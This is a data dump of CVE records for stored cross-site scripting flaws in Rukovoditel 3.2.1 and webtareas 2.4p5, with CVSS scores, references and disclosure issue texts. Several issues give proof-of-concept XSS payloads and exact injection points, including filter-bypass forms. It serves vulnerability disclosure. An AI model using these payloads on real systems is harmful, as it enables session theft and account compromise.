{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Permissions Required", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Permissions Required", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/13
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Note" field in the "Highlight row" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=entities/listing_types&entities_id=24", click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Note" field. --- ![image](https://user-images.githubusercontent.com/67278071/199527294-d7e22040-a46c-4a2e-9e6a-a0506de0d777.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199527350-79dc8509-29e4-4469-98cf-73615aab3dac.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Highlight row" in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/13/comments
1
2022-11-02T15:15:30Z
2022-12-09T03:58:05Z
https://github.com/anhdq201/rukovoditel/issues/13
1,433,328,656
13
4,459
CVE-2022-44948
2022-12-02T20:15:14.320
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Entities groups" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=entities/entities_groups", click "Add" and insert payload "`<img src=1 onerror='alert(document.coookie)'/>`" in Name field. --- ![image](https://user-images.githubusercontent.com/67278071/199500921-7ffbe137-4d9b-4d19-99cb-2d1d19c0ac32.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199501163-5e66e0d3-be88-4845-b5bb-e3a6743325e6.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Entities groups" in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/8/comments
1
2022-11-02T13:26:05Z
2022-12-09T03:58:58Z
https://github.com/anhdq201/rukovoditel/issues/8
1,433,146,115
8
4,460
CVE-2022-44949
2022-12-02T20:15:14.397
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Short Name" field in the "Fields Configuration" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=entities/fields&entities_id=24", click "Add New Field" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Short Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199525621-49dca7df-a3c0-418b-b66a-14eed1af9566.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199525697-c976f006-68e5-4535-9339-bf9ddae63f71.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Fields Configuration" in "Short Name" field in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/12/comments
1
2022-11-02T15:06:25Z
2022-12-09T03:59:25Z
https://github.com/anhdq201/rukovoditel/issues/12
1,433,309,977
12
4,461
CVE-2022-44950
2022-12-02T20:15:14.463
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Name" field in the "Fields Configuration" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=entities/fields&entities_id=24", click "Add New Field" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199525240-5ad76409-7e4e-4492-b3da-18ae31f607bc.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199525276-e217a8a0-b40b-407f-9ef1-576d760ccc8f.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Fields Configuration" in "Name" field in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/10/comments
1
2022-11-02T14:54:55Z
2022-12-09T04:00:03Z
https://github.com/anhdq201/rukovoditel/issues/10
1,433,291,930
10
4,462
CVE-2022-44951
2022-12-02T20:15:14.523
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Form Configuration" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=entities/forms&entities_id=24", click "Add New Form Tab" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199523350-b07bb41c-4e53-4d7d-8ce9-b42388fafea7.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199523480-aa2980df-8ed3-41c1-8825-8f32028bb571.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Form Configuration" in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/11/comments
1
2022-11-02T14:57:10Z
2022-12-09T04:00:32Z
https://github.com/anhdq201/rukovoditel/issues/11
1,433,296,033
11
4,463
CVE-2022-44952
2022-12-02T20:15:14.583
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Not Applicable", "URL Repurposed" ], "url": "http://rukovoditel.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/rukovoditel/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "AF93014A-D2CB-48B2-AB57-692E95E5702D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/rukovoditel/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "rukovoditel" ]
# Version: 3.2.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Application Settings" feature. # Proof of Concept **Step 1:** Go to "/index.php?module=configuration/application", click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Copyright Text" field. --- ![image](https://user-images.githubusercontent.com/67278071/199503312-b74b79e7-1dc4-4836-8bc7-18fc437ca825.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199503425-3fcfb288-b294-46a7-9f8b-43bbf4635426.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability on "Application Settings" in rukovoditel 3.2.1
https://api.github.com/repos/anhdq201/rukovoditel/issues/9/comments
1
2022-11-02T13:26:15Z
2022-12-09T04:01:05Z
https://github.com/anhdq201/rukovoditel/issues/9
1,433,146,355
9
4,464
CVE-2022-44953
2022-12-02T20:15:14.647
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /linkedcontent/listfiles.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Files" feature. # Proof of Concept **Step 1:** Go to "/linkedcontent/listfiles.php?doc_type=0&id=0", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199562123-83a87fca-e8c0-4d0e-a8fc-286a457328d4.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199562244-0e68f231-53fa-4b54-957a-f8ddb8b8b197.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Files" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/8/comments
1
2022-11-02T17:40:23Z
2022-12-09T04:07:02Z
https://github.com/anhdq201/webtareas/issues/8
1,433,539,867
8
4,465
CVE-2022-44954
2022-12-02T20:15:14.703
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /contacts/listcontacts.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Last Name field after clicking "Add".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Contacts" feature. # Proof of Concept **Step 1:** Go to "/contacts/listcontacts.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Last Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199563453-0560c56c-3f74-4b43-914f-a6f9e441bc2b.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199563494-ecebf5c9-b8e5-4582-b6bd-07e311581164.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Contacts" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/10/comments
1
2022-11-02T17:46:44Z
2022-12-09T04:07:48Z
https://github.com/anhdq201/webtareas/issues/10
1,433,547,467
10
4,466
CVE-2022-44955
2022-12-02T20:15:14.767
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the Chat function. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Messages field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Chat" feature. # Proof of Concept **Step 1:** Go to "Chat" feature, insert payload "`<details/open/ontoggle=alert(document.cookie)>`" and click "Enter" in "Messages" field. --- ![image](https://user-images.githubusercontent.com/67278071/199559373-d540fcec-5643-4af3-86ab-7f3913d71eb3.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199559484-fd8fe5f9-82e3-4a10-a205-d6a8515cd398.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Chat" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/5/comments
1
2022-11-02T17:27:09Z
2022-12-09T04:08:21Z
https://github.com/anhdq201/webtareas/issues/5
1,433,523,880
5
4,467
CVE-2022-44956
2022-12-02T20:15:14.827
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /projects/listprojects.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Add projects" function in the "Projects" feature. # Proof of Concept **Step 1:** Go to "/projects/listprojects.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199552385-36ca085b-a9e6-4795-a67a-950dce9c7071.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199552543-d97f16b4-bda1-4682-8538-fd374f000506.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Projects" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/3/comments
1
2022-11-02T16:56:12Z
2022-12-09T04:08:56Z
https://github.com/anhdq201/webtareas/issues/3
1,433,482,717
3
4,468
CVE-2022-44957
2022-12-02T20:15:14.897
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
